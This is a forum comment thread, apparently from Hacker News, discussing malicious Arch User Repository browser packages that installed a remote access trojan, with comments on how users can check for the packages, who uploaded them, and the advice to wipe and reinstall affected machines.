[jabjq]

> We strongly encourage users that may have installed one of these packages […] to take the necessary measures in order to ensure they were not compromised.

How are they supposed to do that when you give them no information as to what the malware does?

[rwmj]

Did you install one of those packages? If yes, nuke from orbit.

More interesting questions are:

- Who was the uploader? A packager? For how long?

- Do they maintain other packages?

- What steps can be taken to ensure that a similar problem doesn't happen in future?

[gpm]

Per the Wayback Machine the username used was danikpapas. As far as Google and duckduckgo know these are the only packages theat username ever uploaded. Considering the purpose was crime it's likely that that username was "stolen" and the person using it on other sites wasn't the same as the one doing this...

The AUR is arch's repository of untrusted user maintained read-the-source-before-installing packages. There's really not much that can be done to prevent similar issues in the future... because the whole purpose of the AUR is to allow random people to upload packages.

Arch doesn't ship with any way to install AUR packages other than downloading the tarball and building them locally. Tools for installing the packages usually force you to read the PKGBUILD that controls the build process (including getting sources) before letting you build the packages. I.e. the reasonable steps have already been taken.

Edit: firefox-patch-bin was first submitted to the AUR 2025-07-16 21:33 (UTC), so less than two days before removal.

[amy214]

>Per the Wayback Machine the username used was danikpapas. As far as Google and duckduckgo know these are the only packages theat username ever uploaded.

I mean... ... if this was a malicious actor who is to say they don't have 15 aliases on 5 linux distros

[diggan]

They are/were AUR packages it seems, anyone can spend 2 minutes and upload essentially anything there, like npm and similar. It's not necessarily a "maintainer" per se, as like the people who manage the packages in the proper Arch repositories, but entirely separate.

With that comes the same warning as downloading random stuff from the internet and executing it, you need to carefully review everything before running/installing it, as you're basically doing a fancy version of "curl | bash" when using the AUR.

[gpm]

It says what the malware does, it's a remote access toolkit... It gives control of your machine to the malware operator.

The malware operator could have done anything with that access... There's no way for the maintainers to know what was done on any given infected machine.

[sp0rk]

Announcements like this typically contain information that will help users identify if they were compromised, such as the name of files that are dropped or modified when the malware is initialized, startup entry names, etc. Obviously the person with remote access can get in and manually start doing things on individual machines, but that doesn't mean there aren't indicators present from the programmatic actions the malware took before that point or on machines that weren't manually accessed.

[akazantsev]

Expecting a complete malware analysis from maintainers is a tad too much. Their goal is to notify users as soon as possible, even if no other information about the malware is available.

Also, an attacker may leave no traces by simply dumping the payload to /tmp.

[gpm]

In addition to the point about "not being expected to do a full malware analysis"...

Assuming the malware doesn't clean up after itself, `pacman -Q firefox-patch-bin librewolf-fix-bin zen-browser-patched-bin` would tell you if they are installed... but if it did clean up after itself... how are the maintainers supposed to know what steps were taken to clean up given that it's a rat that could be running different steps on different computers...

[Shellban]

This is really scary for those who manage multiple things. I'm considering running a factory reset on everything from my router to my Steam Deck and remote server.

[gpm]

Uh... did you install these AUR packages? It seems quite unlikely you installed these on either a router or a steam deck...

That said, if you did, yeah being hacked is scary and I feel for you.

[Shellban]

As @lillylizard pointed out, it turns out that these are new packages, not comprised existing packages like I first thought. Still, the nature of the hack is a Remote Execution, as you pointed out elsewhere, meaning the hacker could pull my router password from the password manager, or grab my SSH keys and log into whatever machine is listed in the known_hosts, or just mess with my Ebay account and the credit card saved on there. The hacker could in theory do literally anything I could do.

[akerl_]

Sure, but only if you’d installed the affected AUR packages. Even if they were old packages, probably your SteamOS didn’t install them from the AUR.

[Shellban]

Whether or not SteamOS installed them is irrelevant. All the hacker would need is to compromise a machine that had some sort of remote access to other devices (ssh in this case, with some sort of keylogger to decrypt the private key).

[johnisgood]

I wonder if he even has any unofficial packages installed.

[Shellban]

I had the regular librewolf-bin package installed on a couple of my machines. It took me a bit of time to note that librewolf-fix-bin is something separate.

[johnisgood]

Yeah do not worry, you are fine.

https://aur.archlinux.org/packages/librewolf-bin#comment-103...

[Ancapistani]

It's ArchLinux. The user is expected to do their own due diligence.

[johnisgood]

And these packages are from AUR, they are not officially supported. AUR means Arch User Repository. You cannot even use Arch Linux's official package manager to install AUR packages either, you need an AUR helper ("makepkg" is sufficient though but it has limitations). These AUR helpers are not even official packages either. Not even yay: https://archlinux.org/packages/?sort=&q=yay.

[Ancapistani]

I’m well aware. Arch isn’t my daily driver anymore, but I used it for many years before really committing to containerization.

My desktop OS is much less of a concern now, so I mostly use macOS. It provides a decent shell and otherwise stays out of my way. I use Windows for gaming.

[michaelmrose]

It's a remote access trojan. There is no acceptable way to be sure of removal short of full reinstalling every OS installed and reinstalling or rebuilding stuff in the Home dir from known good sources.

[npteljes]

In case of any infection, the necessary measures are to take the affected machines offline, extract whatever data you need, and then wipe.